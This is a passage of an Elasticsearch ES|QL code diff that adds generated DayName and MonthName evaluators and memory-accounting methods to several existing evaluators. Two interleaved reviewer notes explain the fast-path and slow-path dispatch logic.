EvalOperator.ExpressionEvaluator} implementation for {@link DayName}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
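[Reviewer's note — not part of the patch.] The new DayName and MonthName evaluator files below follow the same two-path shape as every generated evaluator in this patch. The dispatch is restated here with comments, since the generated source carries none; the code mirrors the patch, the comments are mine:

    @Override
    public Block eval(Page page) {
        // Evaluate the argument; the result always arrives as a Block.
        try (LongBlock valBlock = (LongBlock) val.eval(page)) {
            // asVector() returns non-null only when every position holds
            // exactly one non-null value, which is the common case.
            LongVector valVector = valBlock.asVector();
            if (valVector == null) {
                // Slow path: per-position null and multi-value checks.
                return eval(page.getPositionCount(), valBlock);
            }
            // Fast path: a tight loop with no per-position checks.
            return eval(page.getPositionCount(), valVector).asBlock();
        }
    }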
+ */ +public final class DayNameMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DayNameMillisEvaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator val; + + private final ZoneId zoneId; + + private final Locale locale; + + private final DriverContext driverContext; + + private Warnings warnings; + + public DayNameMillisEvaluator(Source source, EvalOperator.ExpressionEvaluator val, ZoneId zoneId, + Locale locale, DriverContext driverContext) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock valBlock = (LongBlock) val.eval(page)) { + LongVector valVector = valBlock.asVector(); + if (valVector == null) { + return eval(page.getPositionCount(), valBlock); + } + return eval(page.getPositionCount(), valVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { + try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (valBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (valBlock.getValueCount(p) != 1) { + if (valBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendBytesRef(DayName.processMillis(valBlock.getLong(valBlock.getFirstValueIndex(p)), this.zoneId, this.locale)); + } + return result.build(); + } + } + + public BytesRefVector eval(int positionCount, LongVector valVector) { + try(BytesRefVector.Builder result = driverContext.blockFactory().newBytesRefVectorBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendBytesRef(DayName.processMillis(valVector.getLong(p), this.zoneId, this.locale)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "DayNameMillisEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(val); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory val; + + private final ZoneId zoneId; + + private final Locale locale; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory val, ZoneId zoneId, + Locale locale) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + } + + @Override + public DayNameMillisEvaluator get(DriverContext context) { + return new DayNameMillisEvaluator(source, val.get(context), zoneId, locale, context); + } + + @Override + public String toString() { + return "DayNameMillisEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + } +} diff 
--git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameNanosEvaluator.java new file mode 100644 index 0000000000000..958a768c0b293 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameNanosEvaluator.java @@ -0,0 +1,149 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.date; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import java.time.ZoneId; +import java.util.Locale; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BytesRefBlock; +import org.elasticsearch.compute.data.BytesRefVector; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link DayName}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class DayNameNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DayNameNanosEvaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator val; + + private final ZoneId zoneId; + + private final Locale locale; + + private final DriverContext driverContext; + + private Warnings warnings; + + public DayNameNanosEvaluator(Source source, EvalOperator.ExpressionEvaluator val, ZoneId zoneId, + Locale locale, DriverContext driverContext) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock valBlock = (LongBlock) val.eval(page)) { + LongVector valVector = valBlock.asVector(); + if (valVector == null) { + return eval(page.getPositionCount(), valBlock); + } + return eval(page.getPositionCount(), valVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { + try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (valBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (valBlock.getValueCount(p) != 1) { + if (valBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + 
result.appendBytesRef(DayName.processNanos(valBlock.getLong(valBlock.getFirstValueIndex(p)), this.zoneId, this.locale)); + } + return result.build(); + } + } + + public BytesRefVector eval(int positionCount, LongVector valVector) { + try(BytesRefVector.Builder result = driverContext.blockFactory().newBytesRefVectorBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendBytesRef(DayName.processNanos(valVector.getLong(p), this.zoneId, this.locale)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "DayNameNanosEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(val); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory val; + + private final ZoneId zoneId; + + private final Locale locale; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory val, ZoneId zoneId, + Locale locale) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + } + + @Override + public DayNameNanosEvaluator get(DriverContext context) { + return new DayNameNanosEvaluator(source, val.get(context), zoneId, locale, context); + } + + @Override + public String toString() { + return "DayNameNanosEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameMillisEvaluator.java new file mode 100644 index 0000000000000..23cedb591ada5 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameMillisEvaluator.java @@ -0,0 +1,149 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.date; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import java.time.ZoneId; +import java.util.Locale; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BytesRefBlock; +import org.elasticsearch.compute.data.BytesRefVector; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link MonthName}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
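[Reviewer's note — not part of the patch.] The slow path's guard, as it appears in both DayName evaluators above, annotated (comments mine): multi-valued input does not fail the query; a warning is registered and the row becomes null, the established single-value function contract in these generated evaluators.

    if (valBlock.isNull(p)) {
        result.appendNull();                 // null in, null out
        continue position;
    }
    if (valBlock.getValueCount(p) != 1) {
        if (valBlock.getValueCount(p) > 1) {
            // Lazily created Warnings; honors the driver's warnings mode.
            warnings().registerException(
                new IllegalArgumentException("single-value function encountered multi-value"));
        }
        result.appendNull();                 // multi-value in, null out
        continue position;
    }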
+ */ +public final class MonthNameMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MonthNameMillisEvaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator val; + + private final ZoneId zoneId; + + private final Locale locale; + + private final DriverContext driverContext; + + private Warnings warnings; + + public MonthNameMillisEvaluator(Source source, EvalOperator.ExpressionEvaluator val, + ZoneId zoneId, Locale locale, DriverContext driverContext) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock valBlock = (LongBlock) val.eval(page)) { + LongVector valVector = valBlock.asVector(); + if (valVector == null) { + return eval(page.getPositionCount(), valBlock); + } + return eval(page.getPositionCount(), valVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { + try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (valBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (valBlock.getValueCount(p) != 1) { + if (valBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendBytesRef(MonthName.processMillis(valBlock.getLong(valBlock.getFirstValueIndex(p)), this.zoneId, this.locale)); + } + return result.build(); + } + } + + public BytesRefVector eval(int positionCount, LongVector valVector) { + try(BytesRefVector.Builder result = driverContext.blockFactory().newBytesRefVectorBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendBytesRef(MonthName.processMillis(valVector.getLong(p), this.zoneId, this.locale)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "MonthNameMillisEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(val); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory val; + + private final ZoneId zoneId; + + private final Locale locale; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory val, ZoneId zoneId, + Locale locale) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + } + + @Override + public MonthNameMillisEvaluator get(DriverContext context) { + return new MonthNameMillisEvaluator(source, val.get(context), zoneId, locale, context); + } + + @Override + public String toString() { + return "MonthNameMillisEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + 
"]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameNanosEvaluator.java new file mode 100644 index 0000000000000..93e09918c3556 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameNanosEvaluator.java @@ -0,0 +1,149 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.date; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import java.time.ZoneId; +import java.util.Locale; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BytesRefBlock; +import org.elasticsearch.compute.data.BytesRefVector; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link MonthName}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class MonthNameNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MonthNameNanosEvaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator val; + + private final ZoneId zoneId; + + private final Locale locale; + + private final DriverContext driverContext; + + private Warnings warnings; + + public MonthNameNanosEvaluator(Source source, EvalOperator.ExpressionEvaluator val, ZoneId zoneId, + Locale locale, DriverContext driverContext) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock valBlock = (LongBlock) val.eval(page)) { + LongVector valVector = valBlock.asVector(); + if (valVector == null) { + return eval(page.getPositionCount(), valBlock); + } + return eval(page.getPositionCount(), valVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { + try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (valBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (valBlock.getValueCount(p) != 1) { + if (valBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + 
+        result.appendBytesRef(MonthName.processNanos(valBlock.getLong(valBlock.getFirstValueIndex(p)), this.zoneId, this.locale));
+      }
+      return result.build();
+    }
+  }
+
+  public BytesRefVector eval(int positionCount, LongVector valVector) {
+    try(BytesRefVector.Builder result = driverContext.blockFactory().newBytesRefVectorBuilder(positionCount)) {
+      position: for (int p = 0; p < positionCount; p++) {
+        result.appendBytesRef(MonthName.processNanos(valVector.getLong(p), this.zoneId, this.locale));
+      }
+      return result.build();
+    }
+  }
+
+  @Override
+  public String toString() {
+    return "MonthNameNanosEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]";
+  }
+
+  @Override
+  public void close() {
+    Releasables.closeExpectNoException(val);
+  }
+
+  private Warnings warnings() {
+    if (warnings == null) {
+      this.warnings = Warnings.createWarnings(
+              driverContext.warningsMode(),
+              source.source().getLineNumber(),
+              source.source().getColumnNumber(),
+              source.text()
+          );
+    }
+    return warnings;
+  }
+
+  static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
+    private final Source source;
+
+    private final EvalOperator.ExpressionEvaluator.Factory val;
+
+    private final ZoneId zoneId;
+
+    private final Locale locale;
+
+    public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory val, ZoneId zoneId,
+        Locale locale) {
+      this.source = source;
+      this.val = val;
+      this.zoneId = zoneId;
+      this.locale = locale;
+    }
+
+    @Override
+    public MonthNameNanosEvaluator get(DriverContext context) {
+      return new MonthNameNanosEvaluator(source, val.get(context), zoneId, locale, context);
+    }
+
+    @Override
+    public String toString() {
+      return "MonthNameNanosEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]";
+    }
+  }
+}
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/NowEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/NowEvaluator.java
index b45856d6012ca..a5e1ac73bcd02 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/NowEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/NowEvaluator.java
@@ -6,6 +6,7 @@
 
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongVector;
 import org.elasticsearch.compute.data.Page;
@@ -19,6 +20,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class NowEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NowEvaluator.class);
+
   private final Source source;
 
   private final long now;
@@ -38,6 +41,12 @@ public Block eval(Page page) {
     return eval(page.getPositionCount()).asBlock();
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    return baseRamBytesUsed;
+  }
+
   public LongVector eval(int positionCount) {
     try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/CIDRMatchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/CIDRMatchEvaluator.java
index f65c74af6be09..07cac737f7a9b 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/CIDRMatchEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/CIDRMatchEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.String;
 import java.util.Arrays;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -27,6 +28,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CIDRMatchEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CIDRMatchEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator ip;
@@ -69,6 +72,16 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += ip.baseRamBytesUsed();
+    for (EvalOperator.ExpressionEvaluator e : cidrs) {
+      baseRamBytesUsed += e.baseRamBytesUsed();
+    }
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, BytesRefBlock ipBlock, BytesRefBlock[] cidrsBlocks) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       BytesRef ipScratch = new BytesRef();
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/IpPrefixEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/IpPrefixEvaluator.java
index fcc084a7bf240..3e1916fd81cb0 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/IpPrefixEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/IpPrefixEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.String;
 import java.util.function.Function;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -26,6 +27,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class IpPrefixEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(IpPrefixEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator ip;
@@ -75,6 +78,15 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += ip.baseRamBytesUsed();
+    baseRamBytesUsed += prefixLengthV4.baseRamBytesUsed();
+    baseRamBytesUsed += prefixLengthV6.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, BytesRefBlock ipBlock, IntBlock prefixLengthV4Block,
       IntBlock prefixLengthV6Block) {
     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsDoubleEvaluator.java
index 8cda84da6e192..e5f1ee642d869 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsDoubleEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AbsDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AbsDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator fieldVal;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += fieldVal.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock fieldValBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsIntEvaluator.java
index eeb7f46d2224d..8bd0f87643767 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsIntEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AbsIntEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AbsIntEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator fieldVal;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += fieldVal.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public IntBlock eval(int positionCount, IntBlock fieldValBlock) {
     try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsLongEvaluator.java
index 92946a8691ee9..e7b18bfe73430 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AbsLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AbsLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator fieldVal;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += fieldVal.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock fieldValBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AcosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AcosEvaluator.java
index 8f5ab21f30b1a..033674d5f7fa6 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AcosEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AcosEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AcosEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AcosEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
